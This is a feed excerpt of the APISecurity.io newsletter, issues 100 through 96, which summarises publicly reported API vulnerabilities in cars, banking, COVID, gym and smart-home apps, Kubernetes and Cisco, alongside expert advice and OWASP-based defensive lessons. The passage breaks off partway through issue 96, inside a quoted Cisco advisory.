<p>The real attack surface of an API consists of its exposed endpoints. Whether the client uses it or not, every endpoint that is offered can be attacked. None of the assumptions about data formats are valid unless the API enforces them. Every single piece of data sent in a response is exposed, regardless of whether the client renders it or not. The restrictions imposed by the client do not limit an attacker coming after your API. Many of the OWASP API Security Top 10 vulnerabilities aptly illustrate this common misconception. Examples include <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">Broken Object Level Authorization (#1)</a>, <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">Excessive Data Exposure (#3)</a>, <a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting.htm" target="_blank" rel="noopener noreferrer">Lack of Rate Limiting (#4)</a>, and <a href="https://apisecurity.io/encyclopedia/content/owasp/api6-mass-assignment.htm" target="_blank" rel="noopener noreferrer">Mass Assignment (#6)</a>.</p>
<p>API security happens in the underbelly of the application, not on the surface.&#8221;</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7249" src="https://apisecurity.io/wp-content/uploads/2020/09/jim-mancino.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://manicode.com/" target="_blank" rel="noopener noreferrer"><strong>Jim Manico</strong></a><br />
Founder, Secure Coding Instructor at Manicode Security<br />
OWASP</p>
<p>&#8220;APIs emerged as one of the primary attack vectors for modern applications and infrastructure.</p>
<p>It is important to understand that, as it often happens in app security, this one is not going to have a silver bullet or one magic solution that can make an insecure system secure.</p>
<p>Instead, you&#8217;ll need to understand your system components and attack surface, educate your teams about API security, ensure that security spans the complete life-cycle from API design and development, to testing, to runtime protection, know and follow current standards and industry security best practices, and finally automate the whole process to minimize possible human error.&#8221;</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7252" src="https://apisecurity.io/wp-content/uploads/2020/09/kate.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://twitter.com/InsiderPhD" target="_blank" rel="noopener noreferrer"><strong>Katie Paxton-Fear</strong></a><br />
PhD Student, Occasional Bug Bounty Hunter and Educational YouTuber</p>
<p>&#8220;When developing APIs it&#8217;s often tempting to use built-in middleware for authentication, however just because a user is logged in doesn&#8217;t mean they should have permission to see API endpoints! Always question if you need to be making custom middleware for different endpoints based on permission levels &#8211; especially true for mobile apps! And hackers keep an eye out for authentication issues! Always question if you should be seeing the results from an API call!&#8221;</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7244" src="https://apisecurity.io/wp-content/uploads/2020/09/Farah-Hawa.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://www.youtube.com/c/FarahHawa" target="_blank" rel="noopener noreferrer"><strong>Farah Hawa</strong></a><br />
Infosec content creator</p>
<p>&#8220;GraphQL has a very unique feature known as the Introspection system which gives out a lot of information about what kind of queries, mutations, subscriptions, fields and types that the API supports. It essentially gives attackers all the ammo they need so it’s extremely important for developers to secure their GraphQL API, especially those endpoints that are exposed via Introspection, against common API bugs like BOLA/IDOR, SQL Injection, Rate Limiting, etc.&#8221;</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7245" src="https://apisecurity.io/wp-content/uploads/2020/09/mitesh.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://www.linkedin.com/in/shahmiteshh/" target="_blank" rel="noopener noreferrer"><strong>Mitesh Shah</strong></a><br />
Sr. Principal Security Architect, Corporate Information Security, Verizon</p>
<p>&#8220;With the growing popularity of mobile enablement of applications using API backends and projects focusing on transforming legacy applications into microservices based architecture, the need for an API security program is more important than ever. Because of the massive volume of new API development activities, keeping up with security assessments is a key challenge. Focusing on security by design, a whitelisting approach and effectively reducing attack vectors, can help address API security issues. Automation and DevSecOps can help further to ensure baseline API security requirements are met prior to production release.</p>
<p><a href="https://apisecurity.io/" target="_blank" rel="noopener noreferrer">APISecurity.io</a> has achieved the milestone of releasing their 100th issue and continues to provide information around key API security issues and new developments. Looking forward to reading many more in the future.&#8221;</p>
<p>&nbsp;</p>
<hr />
<p>&nbsp;</p>
<p><img loading="lazy" decoding="async" class="alignnone size-full wp-image-7251" src="https://apisecurity.io/wp-content/uploads/2020/09/ravi.jpg" alt="" width="150" height="150" /></p>
<p><a href="https://www.linkedin.com/in/msravikris" target="_blank" rel="noopener noreferrer"><strong>Ravi Krishnan Muthukrishnan</strong></a><br />
Product Security Lead, Financial Industry</p>
<p>&#8220;Application Programming Interfaces (APIs) have proliferated the web, powering well known websites and microservices, and are ever growing with increasing adoption of single page applications that rely on APIs to serve responsive web pages. Most often these APIs hold the gate to sensitive data, so API security is of utmost importance to almost any organization irrespective of their size and hosting model (on-perm vs hybrid vs public cloud). Organizations should embrace a continuous approach to API security with API discovery at the core and have a well defined API security strategy &amp; roadmap. APIs are constantly undergoing changes by developers and API discovery &amp; cataloging is going to be a critical first step to secure these APIs.&#8221;</p>
<p><strong>Disclaimer:</strong> The views and opinions expressed here are those of the author and do not represent or reflect their past or current employers.</p>
<hr />
<h2>100th Newsletter Giveaway</h2>
<p>UPDATE: We had our raffle and the prize went to Alex Savage! Congratulations, Alex, and big thanks to all our readers, contributors, and everyone spreading the word about API Security!</p>
<p><img loading="lazy" decoding="async" class="alignleft size-full wp-image-7299" src="https://apisecurity.io/wp-content/uploads/2020/09/api.io-100-winner.jpg" alt="" width="998" height="534" /></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-100-api-security-advice-top-industry-experts/">Issue 100: API Security advice from top industry experts</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 99: API flaws in the Mercedes-Benz app and Russian inter-bank money transfer</title>
		<link>https://apisecurity.io/issue-99-api-flaws-mercedes-benz-app-russian-inter-bank-money-transfer/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 02 Sep 2020 22:00:59 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7213</guid>

					<description><![CDATA[<p>This week, we check out the API vulnerabilities in the Mercedes-Benz connected cars and the Russian inter-bank money transfer system. We also have the upcoming ASC 2020 conference next week, as well as a recording of IIoT Cybersecurity panel discussion from the recent IIoT World event. Vulnerability: Mercedes-Benz car control The conference Black Hat USA [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-99-api-flaws-mercedes-benz-app-russian-inter-bank-money-transfer/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-99-api-flaws-mercedes-benz-app-russian-inter-bank-money-transfer/">Issue 99: API flaws in the Mercedes-Benz app and Russian inter-bank money transfer</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the API vulnerabilities in the Mercedes-Benz connected cars and the Russian inter-bank money transfer system. We also have the upcoming ASC 2020 conference next week, as well as a recording of IIoT Cybersecurity panel discussion from the recent IIoT World event.</p>
<h2>Vulnerability: <span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Mercedes-Benz car control</span></h2>
<p><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">The conference Black Hat USA has posted the slides and the full research paper from the session &#8220;<a href="https://www.blackhat.com/us-20/briefings/schedule/#security-research-on-mercedes-benz-from-hardware-to-car-control-20746" target="_blank" rel="noopener noreferrer">Security Research on Mercedes-Benz: From Hardware to Car Control</a>&#8221; by Minrui Yan, Jiahao Li, and Guy Harpak. T</span>oo bad there&#8217;s no video recording.</p>
<p><span class="css-901oao css-16my406 r-1qd0xha r-ad9z0x r-bcqeeo r-qvutc0">Researchers got access to the backend intranet through the eSIM of a Mercedes-Benz E-Class connected car. To get connected, they had to reuse the APN settings, spoof IMEI numbers, and locate and reuse certificates. However, once they got through these hurdles and managed to established the connection, they found that the APIs themselves were not protected at all.</span></p>
<p>The researchers could issue commands to any cars of the same model in the same region (China in this case, so estimated 2 million connected cars), such as:</p>
<ul>
<li>Locking or unlocking doors</li>
<li>Opening or closing the roof</li>
<li>Switching lights on or off</li>
<li>Making the car beep</li>
<li>Starting or stopping the engine (limited)</li>
</ul>
<p><img loading="lazy" decoding="async" class=" wp-image-7214 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/09/Mercedes-engine-start-via-API.jpg" alt="" width="509" height="307" /></p>
<p>Quite a list of things, then. Lessons learned here:</p>
<ul>
<li>Never trust the API client: no matter how protected your client and network are, there is a chance that someone breaks through.</li>
<li>Always implement both authentication (to prevent unauthorized access once attackers found your API) and authorization (to prevent <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">IDOR/BOLA</a> style scope expansion like in this case).</li>
</ul>
<h2>Vulnerability: Russian inter-bank transfer system</h2>
<p>The Russian inter-bank money transfer system got hacked through the mobile app of one of the member banks.</p>
<p>Attackers located the vulnerable API by proxying the calls. They found that they could simply replace the source account ID parameter in money transfer calls and the backend would transfer the money, without checking whether the source account belonged to the person invoking the API.</p>
<p>So, how did the attackers get valid account IDs in the first place, then? To make things worse, there was another API endpoint that allowed attackers to enumerate accounts in the bank, creating a list of possible victims.</p>
<p>Unfortunately, the attack was identified only <em>after</em> the vulnerability had already been exploited, and Russian Central Bank had to send banks a warning about the attack. <a href="https://www.kommersant.ru/doc/4465889" target="_blank" rel="noopener noreferrer">The story</a> (unfortunately in Russian, so you might need Google Translate) does not contain the details on how many accounts got compromised or the total volume of funds stolen.</p>
<p>Storyline from a heist movie, this one. Lessons learned:</p>
<ul>
<li><a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm">API1:2019 — Broken object level authorization</a> remains one of the most frequent and the most dangerous vulnerability. Implement resource-level authentication in your APIs, and prevent enumerations!</li>
</ul>
<h2>Conference: API Specification Conference</h2>
<p>Next week, September 9—10, is <a href="https://events.linuxfoundation.org/openapi-asc/" target="_blank" rel="noopener noreferrer">API Specification Conference (ASC) 2020</a>, the annual event by the OpenAPI Initiative (OAI). This year, it is all online, very reasonably priced (just $39, of which $10 goes to charity), and has lots of great content.</p>
<p>The conference is all about API standards: the OpenAPI Specification (OAS), RAML, Blueprint, gRPC, OData, JSON Schema, GraphQL, AsyncAPI, OAuth &#8211; and a great opportunity to meet the geniuses behind them.</p>
<p>This year, I found at least two security sessions on the agenda:</p>
<ul>
<li>&#8220;<a href="https://asc2020.sched.com/event/dgL8" target="_blank" rel="noopener noreferrer">Did You Know You Could Use OpenAPI for Security?</a>&#8221; by Isabelle Mauny, 42Crunch</li>
<li>&#8220;<a href="https://asc2020.sched.com/event/deoT/not-your-uncles-auth-oauth21-and-other-updates-in-securing-your-api-vittorio-bertocci-auth0" target="_blank" rel="noopener noreferrer">Not your Uncle&#8217;s Auth: OAuth2.1 and Other Updates in Securing Your API</a>&#8221; by Vittorio Bertocci, Auth0</li>
</ul>
<h2>Video: IIoT Cybersecurity Challenges</h2>
<p>Industrial Internet of Things (IIoT) is a big driver of what is now called Industry 4.0. IIoT takes automation to the next level and allows industry to become agile and scalable at unprecedented levels.</p>
<p>The conference IIoT World has published <a href="https://iiot-world.com/ics-security/iiot-world-days-panel-industry-4-0-and-cybersecurity-challenges/" target="_blank" rel="noopener noreferrer">the recording of the IIoT cybersecurity panel discussion</a> recorded at the event this summer. Here&#8217;s the quick abstract:</p>
<blockquote><p><em>The Industry 4.0 revolution brings with it a new operational risk for connected, smart manufacturers and digital supply networks: cyber. Industrial Cybersecurity should be an integral part of the strategy, design, and operations from the beginning of any new connected, Industry 4.0–driven initiative.</em></p>
<p><em>In light of Industry 4.0, our expert line up of panelists will examine visibility, control, and situational awareness in relation to your cyber security strategy – and their impact on the future of digital manufacturing.</em></p>
<p><em>This panel, originally presented at IIoT World Days on July 1, 2020, discusses:</em></p>
<ul>
<li><em>Top trends impacting today’s manufacturers security strategy</em></li>
<li><em>What are the cyber security-specific technical issues associated with Industry4.0?</em></li>
<li><em>What are the cyber security-specific training and education issues associated with Industry4.0?</em></li>
</ul>
</blockquote>
<p>The member of the panel were:</p>
<ul>
<li>Joe Weiss (Moderator), PE, CISM, CRISC, ISA Fellow, IEEE Senior Member, Managing Director ISA99; Applied Control Solutions, LLC</li>
<li>Pamela Gupta, President, OutSecure, Inc.</li>
<li>Dmitry Sotnikov, Chief Product Officer, 42Crunch</li>
<li>Chuck Brooks, President, Brooks Consulting International</li>
<li>Bryan Skene, CTO and VP of Product Development, Tempered</li>
</ul>
<p>I loved participating in the panel discussion and would recommend it to anyone interested in the cyber security aspects of IoT.</p>
<p><a href="https://iiot-world.com/ics-security/iiot-world-days-panel-industry-4-0-and-cybersecurity-challenges/" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="wp-image-7215 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/09/IIoT-World-Cybersecurity-Panel.jpg" alt="" width="509" height="291" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-99-api-flaws-mercedes-benz-app-russian-inter-bank-money-transfer/">Issue 99: API flaws in the Mercedes-Benz app and Russian inter-bank money transfer</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 98: APIs as the next frontier in cybercrime</title>
		<link>https://apisecurity.io/issue-98-apis-next-frontier-cybercrime/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 26 Aug 2020 22:00:26 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7190</guid>

					<description><![CDATA[<p>This week, we take a look at the recently reported API vulnerabilities in the COVID-19 tracing app Aura and in Kubernetes, some API security best practices, and a talk on OWASP API Top 10 from DEF CON 2020. Vulnerability: Aura COVID-19 tracing app Another mandatory COVID-19 tracing app,  was found to leak personal information and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-98-apis-next-frontier-cybercrime/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-98-apis-next-frontier-cybercrime/">Issue 98: APIs as the next frontier in cybercrime</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recently reported API vulnerabilities in the COVID-19 tracing app Aura and in Kubernetes, some API security best practices, and a talk on OWASP API Top 10 from DEF CON 2020.</p>
<h2>Vulnerability: Aura COVID-19 tracing app</h2>
<p>Another mandatory COVID-19 tracing app,  was found to leak personal information and health status of users. This time it was <a href="https://techcrunch.com/2020/08/19/coronavirus-albion-security-flaws-app/" target="_blank" rel="noopener noreferrer">Aura, an app that Albion College in Michigan has made mandatory for all students</a>.</p>
<p>Among other issues, such as hard-coded secret keys to the backend server, the app also had an API that allowed to enumerate account numbers. For a given account, one could get the COVID status of a student, the date of testing, and the student&#8217;s full name.</p>
<p>Lessons to be learned from this case are familiar:</p>
<ul>
<li>Never allow any sort of account enumeration in your APIs.</li>
<li>Prevent <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">IDOR/BOLA</a> attacks by enforcing authorization and letting each account to access their own data only.</li>
</ul>
<p>We have previously covered API vulnerabilities in various coronavirus tracing apps in our issues <a href="https://apisecurity.io/issue-83-indias-covid-19-tracing-app-oauth2-api-attacks/" target="_blank" rel="noopener noreferrer">83</a> and <a href="https://apisecurity.io/issue-86-vulnerabilities-sign-apple-qatars-covid19-app-gitlab/" target="_blank" rel="noopener noreferrer">86</a>.</p>
<h2>Vulnerability: Kubernetes</h2>
<p>Do not think that localhost calls are automatically safe. Attacks are often stacked and hackers can expand their attacks once they have passed the initial defense. If there is a vulnerable local proxy on a system that automatically trusts it, attackers can use it for their malicious activity.</p>
<p><a href="https://unit42.paloaltonetworks.com/cve-2020-8558/" target="_blank" rel="noopener noreferrer">Unit42 researchers found a serious vulnerability in some Kubernetes deployments</a>: the CVE-2020-8558 in Kubernetes <code>kube-proxy</code> combined with the <code>insecure-port</code> enabled on an  <code>api-server</code> allowed attackers to gain full control over Kubernetes clusters:</p>
<blockquote><p><em>A security issue assigned <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8558">CVE-2020-8558</a> was recently discovered in the kube-proxy, a networking component running on Kubernetes nodes. The issue exposed internal services of Kubernetes nodes, often run without authentication. On certain Kubernetes deployments, this could have exposed the api-server, allowing an unauthenticated attacker to gain complete control over the cluster. An attacker with this sort of access could steal information, deploy crypto miners or remove existing services altogether.</em></p>
<p><em>The vulnerability exposed nodes’ localhost services – services meant to be accessible only from the node itself – to hosts on the local network and to pods running on the node. Localhost bound services expect that only trusted, local processes can interact with them, and thus often serve requests without authentication. If your nodes run localhost services without enforcing authentication, you are affected.</em></p>
<p><em>The issue details were <a href="https://github.com/kubernetes/kubernetes/issues/90259">made public</a> on April 18, 2020, and a <a href="https://github.com/kubernetes/kubernetes/pull/91569">patch</a> released on June 1, 2020. We worked to assess additional impact to Kubernetes clusters and found that some Kubernetes installations don’t disable the api-server insecure-port, which is normally only accessible from within the master node. Exploiting CVE-2020-8558, attackers can gain access to the insecure-port and gain full control over the cluster.</em></p></blockquote>
<h2>Opinion: APIs Are the Next Frontier in Cybercrime</h2>
<p><a href="https://threatpost.com/apis-next-frontier-cybercrime/158536/" target="_blank" rel="noopener noreferrer">Jason Kent published a write-up on why APIs are an easy target for criminals</a>. He lists the following API vulnerability factors and the ways to mitigate them:</p>
<ol>
<li>APIs too easy to discover:
<ul>
<li>Only share APIs with those authorized.</li>
<li>Use certificate pinning.</li>
<li>Obfuscate and control API requests.</li>
</ul>
</li>
<li>APIs too verbose:
<ul>
<li>Don&#8217;t leak information in error responses, like whether or not an account exists in the system.</li>
</ul>
</li>
<li>API objects with too many parameters / properties:
<ul>
<li>Limit the properties that APIs return to the bare minimum needed.</li>
</ul>
</li>
<li>APIs have too much data:
<ul>
<li>Don&#8217;t store the data that you don&#8217;t need.</li>
<li>Don&#8217;t allow anonymous access to data.</li>
<li>Don&#8217;t expose any data related to the internal workings of applications or infrastructure.</li>
</ul>
</li>
<li>APIs not designed for security
<ul>
<li>Review the security architecture of your applications.</li>
</ul>
</li>
</ol>
<h2>Video: API (in)Security TOP 10: Guided tour</h2>
<p>DEF CON AppSec Village has published a session recording by two of the <a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm" target="_blank" rel="noopener noreferrer">OWASP API Security Top 10</a> team members, David Sopas and Paulo Silva. In their presentation, they provide examples of the following attacks:</p>
<ul>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm" target="_blank" rel="noopener noreferrer">Broken user authentication</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm" target="_blank" rel="noopener noreferrer">Broken object level authorization</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization.htm" target="_blank" rel="noopener noreferrer">Broken function level authorization</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm" target="_blank" rel="noopener noreferrer">Excessive data exposure</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api7-security-misconfiguration.htm" target="_blank" rel="noopener noreferrer">Security misconfiguration</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection.htm" target="_blank" rel="noopener noreferrer">Injection</a></li>
</ul>
<p><iframe loading="lazy" title="David Sopas | Paulo Silva - API (in)Security TOP 10: Guided tour - DEF CON 28SM AppSec Village" width="640" height="360" src="https://www.youtube.com/embed/_WdDq9miqyo?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-98-apis-next-frontier-cybercrime/">Issue 98: APIs as the next frontier in cybercrime</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 97: Gym apps &#038; home automation vulnerabilities, how to not leak API keys</title>
		<link>https://apisecurity.io/issue-97-gym-apps-home-automation-vulnerabilities-not-leak-api-keys/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 19 Aug 2020 22:00:30 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7175</guid>

					<description><![CDATA[<p>This week, we check out the recent API vulnerabilities in the gym management platform Fizikal and the HDL smart home automation. We also have a great detailed write-up on the recent HacktivityCon 2020 Capture the Flag challenge, and a DEF CON talk on leaking API keys. Vulnerability: Fizikal Apps use platforms to get to the [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-97-gym-apps-home-automation-vulnerabilities-not-leak-api-keys/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-97-gym-apps-home-automation-vulnerabilities-not-leak-api-keys/">Issue 97: Gym apps &#038; home automation vulnerabilities, how to not leak API keys</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the recent API vulnerabilities in the gym management platform Fizikal and the HDL smart home automation. We also have a great detailed write-up on the recent HacktivityCon 2020 Capture the Flag challenge, and a DEF CON talk on leaking API keys.</p>
<h2>Vulnerability: Fizikal</h2>
<p>Apps use platforms to get to the market faster and to avoid re-inventing the wheel. As a flip side, sometimes the security issues of these platforms can come and bite the apps.</p>
<p>Fizikal is a management platform for gym apps that is used in about 80 different apps, with a total of about 240 000 users. <a href="https://www.bleepingcomputer.com/news/security/gym-app-management-platform-exposed-info-of-thousands-of-users/" target="_blank" rel="noopener noreferrer">Sahar Avitan from Security Joes found a set of vulnerabilities in Fizikal&#8217;s APIs</a> that allowed attackers to find users on the platform and extract their profile information or take over their accounts.</p>
<p>As often happens, the password reset API was the weakest link. Avitan found out that he could make a call to it and supply a phone number as a parameter. The API response was different for phone numbers that existed in the platform  than on those that didn&#8217;t. As phone numbers are easy to enumerate, this gave attackers a way to find who had and account and who did not.</p>
<p>In the next step, the reset code turned out to be just a four digit number, resulting in  just 10 000 possible combinations to try. A lack of proper rate limiting on the API made it simple to brute-force and enumerate all the combinations. All this culminated in a full account takeover, meaning that attackers could retrieve personal details, like:</p>
<ul>
<li>Phone number</li>
<li>Full name</li>
<li>Date of birth</li>
<li>Email address</li>
<li>Postal address</li>
<li>ID number</li>
<li>Gym attendance schedule</li>
</ul>
<p>Powerful stuff, especially when combined properly. To avoid similar API vulnerabilities:</p>
<ul>
<li><a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm">API3:2019 — Excessive data exposure</a>: Make sure that your API responses do not over-communicate. For example, make sure user account presence is not revealed.</li>
<li><a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting.htm">API4:2019 — Lack of resources and rate limiting</a>: Rate limiting is not a one-size-fits-all policy. Sensitive APIs, such as login or password reset, must have much stricter limits and enforced not only by IP address but also by user record.</li>
<li><a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm">API2:2019 — Broken authentication</a>: Remember that the main login API is not the only one used for authentication, operations like password reset are as important.</li>
</ul>
<h2>Vulnerability: HDL Automation</h2>
<p>Barak Sternberg did a presentation at DEF CON on the <a href="https://www.bleepingcomputer.com/news/security/bugs-in-hdl-automation-expose-iot-devices-to-remote-hijacking/" target="_blank" rel="noopener noreferrer">vulnerabilities that he found in the HDL Automation smart home and building management system</a>:</p>
<ul>
<li>The endpoint <code>/api/GetRoomBindingDevice</code> was vulnerable to SQL injection and thus leaking information about devices and users.<br />
<img loading="lazy" decoding="async" class="" src="https://www.bleepstatic.com/images/news/u/1100723/2020%20Misc/HDL-SQLi-SentinelOne.png" width="456" height="278" /></li>
<li>The configuration management created shadow accounts for all user accounts. These shadow accounts had <code>-debug</code> added to them (as is <code>user-debug@email.com</code>). So, if a user&#8217;s email was from public email service like Gmail, attackers could just register a mailbox for the valid shadow account with the <code>-debug</code> and reset the password for the shadow account to get full access to account configuration.</li>
</ul>
<p>Click the link above to read the summary of the story in BleepingComputer, or watch the full recording from DEF CON below:</p>
<p><iframe loading="lazy" title="DEF CON Safe Mode IoT Village - Barak Sternberg  - Hacking smart devices for fun and profit" width="640" height="360" src="https://www.youtube.com/embed/l18wjygqrKM?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>Lessons learned here:</p>
<ul>
<li><a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection.htm">API8:2019 — Injection</a>: Define and sanitize your inputs to prevent injections.</li>
<li><a class="MiniTOC1" href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm">API2:2019 — Broken authentication</a>: Avoid non-standard user record schemes (like the shadow accounts here) that rely on security by obscurity.</li>
</ul>
<h2>Hackathons: Capture The Flag challenge</h2>
<p>Capture the Flag (CTF) is a popular format of hackathon challenges in which participants need to break into an intentionally vulnerable system.</p>
<p><a href="https://buer.haus/2020/07/31/hcktivitycon-pizza-time-web-750/" target="_blank" rel="noopener noreferrer">Here is a nice detailed write-up by Brett Buerhaus</a> on solving a CTF challenge at the recent HackerOne HacktivityCon 2020. The challenge included:</p>
<ul>
<li>Finding and exploring an API vulnerability</li>
<li>Endpoint discovery</li>
<li>Server-Side Request Forgery (SSRF)</li>
<li>SQL injections</li>
<li>Cross-Site Scripting (XSS)</li>
</ul>
<p>If you ever wanted to follow a breakdown on this kind of challenge, this is a prime candidate for it.</p>
<h2>Videos: API keys</h2>
<p>Leaked API keys remain one of the key sources of API breaches. See this recording of the Red Team Village session &#8220;Have my keys been pwned? &#8211; API Edition&#8221;  by Jose Hernandez and Rod Soto to learn how API keys leak out from CI/CD, how they can be found, and how to prevent all this from happening.</p>
<p><iframe loading="lazy" title="Have my keys been pwned? - API Edition by Jose Hernandez and Rod Soto" width="640" height="360" src="https://www.youtube.com/embed/0JRcJVv0uXU?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-97-gym-apps-home-automation-vulnerabilities-not-leak-api-keys/">Issue 97: Gym apps &#038; home automation vulnerabilities, how to not leak API keys</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 96: Vulnerabilities at Cisco and MGM Grand Resort, tutorial on Chrome DevTools and pentesting with GraphQL</title>
		<link>https://apisecurity.io/issue-96-vulnerabilities-cisco-mgm-grand-casino-tutorial-chrome-devtools-pentesting-graphql/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 12 Aug 2020 22:00:12 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7156</guid>

					<description><![CDATA[<p>This week, we take a look at the recent vulnerability in Cisco Data Center Network Manager, as well as the API aspect of the data breach at MGM Grand Resort. Plus, we have a couple of tutorials: one on using Chrome Developer Tools to discover API paths, and an introductory one on GraphQL APIs and [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-96-vulnerabilities-cisco-mgm-grand-casino-tutorial-chrome-devtools-pentesting-graphql/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-96-vulnerabilities-cisco-mgm-grand-casino-tutorial-chrome-devtools-pentesting-graphql/">Issue 96: Vulnerabilities at Cisco and MGM Grand Resort, tutorial on Chrome DevTools and pentesting with GraphQL</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recent vulnerability in Cisco Data Center Network Manager, as well as the API aspect of the data breach at MGM Grand Resort. Plus, we have a couple of tutorials: one on using Chrome Developer Tools to discover API paths, and an introductory one on GraphQL APIs and how to penetration test them.</p>
<h2>Vulnerability: Cisco Data Center Network Manager</h2>
<p><a href="https://threatpost.com/critical-high-severity-cisco-flaws-fixed-data-center-network-manager/157861/" target="_blank" rel="noopener noreferrer">Cisco has released a set of patches for their Data Center Network Manager</a> (DCNM), a platform for managing Cisco data centers.</p>
<p>One of the critical vulnerabilities that Cisco fixed was, quoting from the <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-dcnm-bypass-dyEejUMs" target="_blank" rel="noopener noreferrer">Cisco Security Advisory</a>:</p>
<blockquote><p><em>&#8220;A vulnerability in the REST API of Cisco Data Center Network Manager (DCNM) could allow an unauthenticated, remote attacker to bypass authentication and execute arbitrary actions with administrative privileges on an affected device.</em></p>
